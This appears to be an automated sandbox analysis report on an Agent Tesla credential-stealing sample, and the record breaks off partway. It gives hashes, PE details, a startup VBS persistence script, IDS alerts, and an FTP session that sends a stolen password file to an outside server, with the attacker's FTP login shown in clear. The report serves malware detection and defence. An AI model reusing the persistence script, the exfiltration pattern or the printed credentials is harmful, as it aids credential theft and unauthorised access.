Preview:	.c.G40OGFHRC..QH.UG5XXUU.THUU98G70OGBHRC08QHGUG5XXUUATHUU98G.0OGLW.M0.X.f.Fy.y.=('h%'V_5V]o$#&<,D.3-g'2[x1;u...u8V\".=BMfHRC08QH..G5.YVU2..3U98G70OG.HPB;9ZHG.D5XPUUATHU..;G7.OGB.QC08.HGuG5XZUUETHUU98G30OGBHRC0.UHGWG5XXUUCT..U9(G7 OGBHBC0(QHGUG5HXUUATHUU98G;.LG.HRC0.RH.PG5XXUUATHUU98G70OGBHVC<8QHGUG5XXUUATHUU98G70OGBHRC08QHGUG5XXUUATHUU98G70OGBhRC88QHGUG5XXUUItHU.98G70OGBHRC.L403UG5<.VUAtHUU.;G72OGBHRC08QHGUG5xXU5o&;'698Gq5OGB.QC0>QHG.D5XXUUATHUU98Gw0O.l:7/_[QHKUG5XXQUAVHUU.;G70OGBHRC08QH.UGwXXUUATHUU98G70OG..QC08QH.UG5ZXPU..JU=.9G40OGCHRE08QHGUG5XXUUATHUU98G70OGBHRC08QHGUG5XXUUATHUU98G....}xEoB%R...?.V..[..@..8qZ.9\.{~\.....-S..T.Ze...>....=.K5AP...`8^$O<."z6Y.....us7ps.N).=...+g.:Nq.....l....LDf...!..;78{ $890.k&QQ=..J.B08QH........(,..x:7Y."7.....)....&XUU%THU'98GV0OG.HRC_8QH)UG5&XUU?THU.98Gw0OGuHRC.8QHUG5\|XUU?THU.D7H....1.C08QHr....5.....b...qF.1. p...\....Bf.W=.6.....6..[..U.9E.v.OFSC0Z_QVMiF....f54KB@OV@<._......~.x..$...dJ.;BHRC08.HG.G5X..U.THU.9.G..OGB.C.8.H...5

C:\Users\user\AppData\Local\roundup\phagocytose.exe

Download File

Process:	C:\Users\user\Desktop\28uMwHvbTD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	604672
Entropy (8bit):	7.9330812981122545
Encrypted:	false
SSDEEP:	12288:2quErHF6xC9D6DmR1J98w4oknqOOCyQfc8KeXMV7d/AhbUnWfW:7rl6kD68JmlotQfjXcV7B0bUWe
MD5:	B12B444B2A02C69499AED36944384160
SHA1:	69C880815225DE5DB3927AF16727020CC9D563D5
SHA-256:	97A8BF73809611EE4048ADC2714685BD29BBA3E677F5589B1053E30E0D98CF53
SHA-512:	82731330E96BFBE9D151E70A9263E1E9444B2F9447D17FA33281177AC752724DC25FA58F7B64C05A4FFEAE372D2009457B6778AD4A90DEAAC3F7D92CCC6A07CB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L....oYg.........."......`...........Y.......`....@..........................@............@...@.......@......................3..$....`.......................7.......................................[..H...........................................UPX0....................................UPX1.....`.......^..................@....rsrc........`.......b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs

Download File

Process:	C:\Users\user\AppData\Local\roundup\phagocytose.exe
File Type:	data
Category:	dropped
Size (bytes):	276
Entropy (8bit):	3.4234168233177504
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclgMsUEZ+lX19wPYslcyBnriIM8lfQVn:DsO+vNlgMsQ1cDRmA2n
MD5:	C4E124F0A74583FBC966D010C4B44E22
SHA1:	7EB858301D7EECA3A33F0ACE20C33EFDF59903E7
SHA-256:	D3BC101DDB1D6985338481234A22635C263A012CCA38A803AFBBBE4F06B5F6B6
SHA-512:	0EEB666AD4D072B0C4BCD638A4950B430DAF7D15788F094368951D5B9A99DCD773AC0D08668C43569E1D582BCE2CD06A0AB0CA88411B55ACDCB9F8C80688F9DD
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.r.o.u.n.d.u.p.\.p.h.a.g.o.c.y.t.o.s.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.9330812981122545
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	28uMwHvbTD.exe
File size:	604'672 bytes
MD5:	b12b444b2a02c69499aed36944384160
SHA1:	69c880815225de5db3927af16727020cc9d563d5
SHA256:	97a8bf73809611ee4048adc2714685bd29bba3e677f5589b1053e30e0d98cf53
SHA512:	82731330e96bfbe9d151e70a9263e1e9444b2f9447d17fa33281177ac752724dc25fa58f7b64c05a4ffeae372d2009457b6778ad4a90deaac3f7d92ccc6a07cb
SSDEEP:	12288:2quErHF6xC9D6DmR1J98w4oknqOOCyQfc8KeXMV7d/AhbUnWfW:7rl6kD68JmlotQfjXcV7B0bUWe
TLSH:	68D412C546E6D962C128A37580798D84887538338F8C777FC768E65EBC32307D91BA99
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x5159e0
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67596F14 [Wed Dec 11 10:53:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fc6683d30d9f25244a50fd5357825e79

Entrypoint Preview

Instruction
pushad
mov esi, 004C0000h
lea edi, dword ptr [esi-000BF000h]
push edi
jmp 00007F9788BC93ADh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F9788BC93A9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F9788BC938Fh
mov eax, 00000001h
add ebx, ebx
jne 00007F9788BC93A9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F9788BC93ADh
jne 00007F9788BC93CAh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F9788BC93C1h
dec eax
add ebx, ebx
jne 00007F9788BC93A9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F9788BC9376h
add ebx, ebx
jne 00007F9788BC93A9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F9788BC93F4h
xor ecx, ecx
sub eax, 03h
jc 00007F9788BC93B3h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F9788BC9417h
sar eax, 1
mov ebp, eax
jmp 00007F9788BC93ADh
add ebx, ebx
jne 00007F9788BC93A9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F9788BC936Eh
inc ecx
add ebx, ebx
jne 00007F9788BC93A9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F9788BC9360h
add ebx, ebx
jne 00007F9788BC93A9h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F9788BC9391h
jne 00007F9788BC93ABh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F9788BC9386h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F9788BC93B0h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1533c4	0x424	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x116000	0x3d3c4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1537e8	0xc	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x115bc4	0x48	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0xbf000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0xc0000	0x56000	0x55e00	f0d3975653f11ca2f75f6bfe19e28f7d	False	0.9870616129912664	data	7.935184876255406	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x116000	0x3e000	0x3d800	88b01a6ffb3479cad9e4217f5deca633	False	0.9181791476117886	data	7.875294981672189	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1165ac	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0x1166d8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0x116804	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0x116930	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0x116c1c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0x116d48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0x117bf4	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0x1184a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0x118a0c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0x11afb8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0x11c064	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	1.1375
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	1.007703081232493
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.989247311827957
RT_STRING	0xce110	0x490	data	English	Great Britain	0.9657534246575342
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.9138381201044387
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.9152334152334153
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.9600355239786856
RT_STRING	0xcf660	0x158	data	English	Great Britain	1.0145348837209303
RT_RCDATA	0x11c4d0	0x3695b	data			1.0003399245904132
RT_GROUP_ICON	0x152e30	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x152eac	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x152ec4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x152edc	0x14	data	English	Great Britain	1.25
RT_VERSION	0x152ef4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x152fd4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	GetAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetOpenFileNameW
GDI32.dll	LineTo
IPHLPAPI.DLL	IcmpSendEcho
MPR.dll	WNetUseConnectionW
ole32.dll	CoGetObject
OLEAUT32.dll	VariantInit
PSAPI.DLL	GetProcessMemoryInfo
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
UxTheme.dll	IsThemeActive
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	connect

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T22:19:40.326284+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.9	49882	162.241.62.63	21	TCP
2025-01-10T22:19:40.737107+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.9	49893	162.241.62.63	40112	TCP
2025-01-10T22:19:40.742576+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.9	49893	162.241.62.63	40112	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:19:22.062412977 CET	49775	80	192.168.2.9	208.95.112.1
Jan 10, 2025 22:19:22.067270041 CET	80	49775	208.95.112.1	192.168.2.9
Jan 10, 2025 22:19:22.067342043 CET	49775	80	192.168.2.9	208.95.112.1
Jan 10, 2025 22:19:22.068661928 CET	49775	80	192.168.2.9	208.95.112.1
Jan 10, 2025 22:19:22.073529005 CET	80	49775	208.95.112.1	192.168.2.9
Jan 10, 2025 22:19:22.559628010 CET	80	49775	208.95.112.1	192.168.2.9
Jan 10, 2025 22:19:22.601931095 CET	49775	80	192.168.2.9	208.95.112.1
Jan 10, 2025 22:19:23.718632936 CET	49787	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:23.723468065 CET	21	49787	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:23.723596096 CET	49787	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:23.728115082 CET	49787	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:23.732956886 CET	21	49787	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:23.733007908 CET	49787	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:37.911340952 CET	49876	80	192.168.2.9	208.95.112.1
Jan 10, 2025 22:19:37.916212082 CET	80	49876	208.95.112.1	192.168.2.9
Jan 10, 2025 22:19:37.916534901 CET	49876	80	192.168.2.9	208.95.112.1
Jan 10, 2025 22:19:37.916691065 CET	49876	80	192.168.2.9	208.95.112.1
Jan 10, 2025 22:19:37.921526909 CET	80	49876	208.95.112.1	192.168.2.9
Jan 10, 2025 22:19:38.267333031 CET	49775	80	192.168.2.9	208.95.112.1
Jan 10, 2025 22:19:38.399759054 CET	80	49876	208.95.112.1	192.168.2.9
Jan 10, 2025 22:19:38.445688009 CET	49876	80	192.168.2.9	208.95.112.1
Jan 10, 2025 22:19:38.988122940 CET	49882	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:38.992928028 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:38.993153095 CET	49882	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:39.492995977 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:39.493311882 CET	49882	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:39.498083115 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:39.607135057 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:39.607458115 CET	49882	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:39.612294912 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:39.821233988 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:39.821448088 CET	49882	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:39.826267004 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:39.932923079 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:39.933199883 CET	49882	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:39.938016891 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.044450998 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.044620037 CET	49882	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:40.049463034 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.209043026 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.209233046 CET	49882	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:40.213992119 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.320554018 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.321219921 CET	49893	40112	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:40.326096058 CET	40112	49893	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.326175928 CET	49893	40112	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:40.326283932 CET	49882	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:40.331270933 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.736865997 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.737107038 CET	49893	40112	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:40.737194061 CET	49893	40112	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:40.742041111 CET	40112	49893	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.742520094 CET	40112	49893	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.742575884 CET	49893	40112	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:40.789431095 CET	49882	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:19:40.865037918 CET	21	49882	162.241.62.63	192.168.2.9
Jan 10, 2025 22:19:40.914809942 CET	49882	21	192.168.2.9	162.241.62.63
Jan 10, 2025 22:20:28.992866993 CET	49876	80	192.168.2.9	208.95.112.1
Jan 10, 2025 22:20:28.997827053 CET	80	49876	208.95.112.1	192.168.2.9
Jan 10, 2025 22:20:28.997910023 CET	49876	80	192.168.2.9	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:19:22.046282053 CET	64126	53	192.168.2.9	1.1.1.1
Jan 10, 2025 22:19:22.053925991 CET	53	64126	1.1.1.1	192.168.2.9
Jan 10, 2025 22:19:23.248347998 CET	61859	53	192.168.2.9	1.1.1.1
Jan 10, 2025 22:19:23.717454910 CET	53	61859	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 22:19:22.046282053 CET	192.168.2.9	1.1.1.1	0x33f3	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:19:23.248347998 CET	192.168.2.9	1.1.1.1	0x3199	Standard query (0)	ftp.antoniomayol.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 22:19:09.867769003 CET	1.1.1.1	192.168.2.9	0x8996	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:19:09.867769003 CET	1.1.1.1	192.168.2.9	0x8996	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:19:22.053925991 CET	1.1.1.1	192.168.2.9	0x33f3	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:19:23.717454910 CET	1.1.1.1	192.168.2.9	0x3199	No error (0)	ftp.antoniomayol.com	antoniomayol.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:19:23.717454910 CET	1.1.1.1	192.168.2.9	0x3199	No error (0)	antoniomayol.com		162.241.62.63	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49775	208.95.112.1	80	6292	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:19:22.068661928 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jan 10, 2025 22:19:22.559628010 CET	175	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:19:21 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49876	208.95.112.1	80	3376	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:19:37.916691065 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jan 10, 2025 22:19:38.399759054 CET	175	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:19:37 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 44 X-Rl: 43 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 10, 2025 22:19:39.492995977 CET	21	49882	162.241.62.63	192.168.2.9	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 15:19. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 15:19. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 15:19. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Jan 10, 2025 22:19:39.493311882 CET	49882	21	192.168.2.9	162.241.62.63	USER johnson@antoniomayol.com
Jan 10, 2025 22:19:39.607135057 CET	21	49882	162.241.62.63	192.168.2.9	331 User johnson@antoniomayol.com OK. Password required
Jan 10, 2025 22:19:39.607458115 CET	49882	21	192.168.2.9	162.241.62.63	PASS cMhKDQUk1{;%
Jan 10, 2025 22:19:39.821233988 CET	21	49882	162.241.62.63	192.168.2.9	230-OK. Current restricted directory is / 230-OK. Current restricted directory is /230 18 Kbytes used (0%) - authorized: 2048000 Kb
Jan 10, 2025 22:19:39.932923079 CET	21	49882	162.241.62.63	192.168.2.9	504 Unknown command
Jan 10, 2025 22:19:39.933199883 CET	49882	21	192.168.2.9	162.241.62.63	PWD
Jan 10, 2025 22:19:40.044450998 CET	21	49882	162.241.62.63	192.168.2.9	257 "/" is your current location
Jan 10, 2025 22:19:40.044620037 CET	49882	21	192.168.2.9	162.241.62.63	TYPE I
Jan 10, 2025 22:19:40.209043026 CET	21	49882	162.241.62.63	192.168.2.9	200 TYPE is now 8-bit binary
Jan 10, 2025 22:19:40.209233046 CET	49882	21	192.168.2.9	162.241.62.63	PASV
Jan 10, 2025 22:19:40.320554018 CET	21	49882	162.241.62.63	192.168.2.9	227 Entering Passive Mode (162,241,62,63,156,176)
Jan 10, 2025 22:19:40.326283932 CET	49882	21	192.168.2.9	162.241.62.63	STOR PW_user-887849_2025_01_10_16_19_37.html
Jan 10, 2025 22:19:40.736865997 CET	21	49882	162.241.62.63	192.168.2.9	150 Accepted data connection
Jan 10, 2025 22:19:40.865037918 CET	21	49882	162.241.62.63	192.168.2.9	226-18 Kbytes used (0%) - authorized: 2048000 Kb 226-18 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred 226-18 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred226 0.113 seconds (measured here), 2.74 Kbytes per second

Target ID:	0
Start time:	16:19:13
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\28uMwHvbTD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\28uMwHvbTD.exe"
Imagebase:	0x740000
File size:	604'672 bytes
MD5 hash:	B12B444B2A02C69499AED36944384160
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:19:17
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\roundup\phagocytose.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\28uMwHvbTD.exe"
Imagebase:	0xe20000
File size:	604'672 bytes
MD5 hash:	B12B444B2A02C69499AED36944384160
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:19:20
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\28uMwHvbTD.exe"
Imagebase:	0x710000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1585828509.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1585828509.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: 